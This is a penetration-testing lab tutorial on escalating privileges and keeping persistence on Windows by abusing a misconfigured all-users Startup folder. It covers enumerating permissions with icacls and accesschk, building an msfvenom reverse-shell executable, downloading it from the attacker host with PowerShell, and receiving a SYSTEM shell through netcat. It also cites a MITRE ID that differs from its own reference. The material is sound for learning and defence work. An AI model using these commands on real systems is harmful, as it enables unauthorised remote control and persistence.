Windows Privilege Escalation: Boot Logon Autostart Execution (Startup Folder)
Windows Startup folder may be targeted by an attacker to escalate privileges or persistence attacks. Adding an application to a startup folder or referencing it using a Registry run key are two ways to do this. When a user signs in, the application linked will be executed if an item is in the “run keys” in the Registry or startup folder. These programs will be executed under the perspective of the user and will have the account’s associated permissions level.
There are two techniques to perform Logon Autostart Execution :
Logon Autostart Execution: Registry Run Keys
Logon Autostart Execution: Startup Folder
Table of Content
Windows Startup Folder
Boot | Logon Autostart Execution (Mitre Attack)
Prerequisite
Lab Setup
Privilege Escalation by Abusing Startup Folder
- Enumerating Assign Permissions using Icacls
- Enumerating Assign Permissions using Accesschk.exe
- Creating Malicious Executable
Windows Startup Folder
The Startup folder was a folder accessible from the Start Menu. Programs saved in this folder would start up immediately once users turned on their machine. There are two locations for the startup folder in windows.
- Startup folder that functions at the system level and is accessible by all user accounts.
The All Users Startup folder is found in the following path:
- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
- Run dialog box: Windows Key + R), type shell:common startup
- Each user on the system has their own startup folder that executes at the user level.
The Current User Startup folder is located here:
- C:\Users\<User_Name>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
- Run dialog box: Windows Key + R), type shell: startup
Boot | Logon Autostart Execution: Startup Folder
Injecting a malicious program within a startup folder will also cause that program to execute when a user logs in, thus it may help an attacker to perform persistence or privilege escalation Attacks from misconfigured startup folder locations.
This technique is the most driven method for persistence used by well know APTs such as APT3, APT33, APT39 and etc.
Mitre ID: T1574.001
Tactics: Privilege Escalation & Persistence
Platforms: Windows
Prerequisite
Target Machine: Windows 10
Attacker Machine: Kali Linux
Tools: AccessChk.exe
Condition: Compromise the target machine with low privilege access either using Metasploit or Netcat, etc.
Objective: Escalate the NT Authority /SYSTEM privileges for a low privileged user by exploiting the Misconfigured Startup folder.
Lab Setup
Note: Given steups will create a loophole through misconfigured startup folder, thus avoiding such configuration in a production environment.
Step 1: Navigate to the Startup directory using the following path:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
Step2: Access the startup folder properties and select the security option. Click on the Edit option to assign dangerous permissions to the Users group.
Step 3: Select Users group on the targeted system and assign Read Write or FULL Control permissions.
Privilege Escalation by Abusing Startup Folder
Enumerating Assign Permissions with Icacls
Attackers can exploit these configuration locations to launch malware, such as RAT, in order to sustain persistence during system reboots.
Following an initial foothold, we can identify permissions using the following command:
icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Enumerating Assign Permissions using Accesschk.exe
The accesschk.exe is Sysinternals tool another permission checker tool.
accesschk.exe /accepteula "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Here Read-write permission is assigned on BUILTIN\Users
Creating Malicious Executable
As we know the current user owns read-write permission for the startup folder thus we can inject RAT to perform persistence or privilege escalation. Let’s create an executable program with the help of msfvenom.
msfvenom –p windows/shell_reverse_tcp lhost=192.168.1.3 lport=8888 –f exe > shell.exe python –m SimpleHTTPServer 80
Executing Malicious Executable
Start a netcat listener in a new terminal and transfer the shell.exe with the help of the following command
cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup powershell wget 192.168.1.3/shell.exe -o shell.exe dir
As we know this attack is named as Boot Logon Autostart Execution which means the shell.exe file operates when the system will reboot.
The attacker will get a reverse connection in the new netcat session as NT Authority \System
Reference: https://attack.mitre.org/techniques/T1547/001/
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here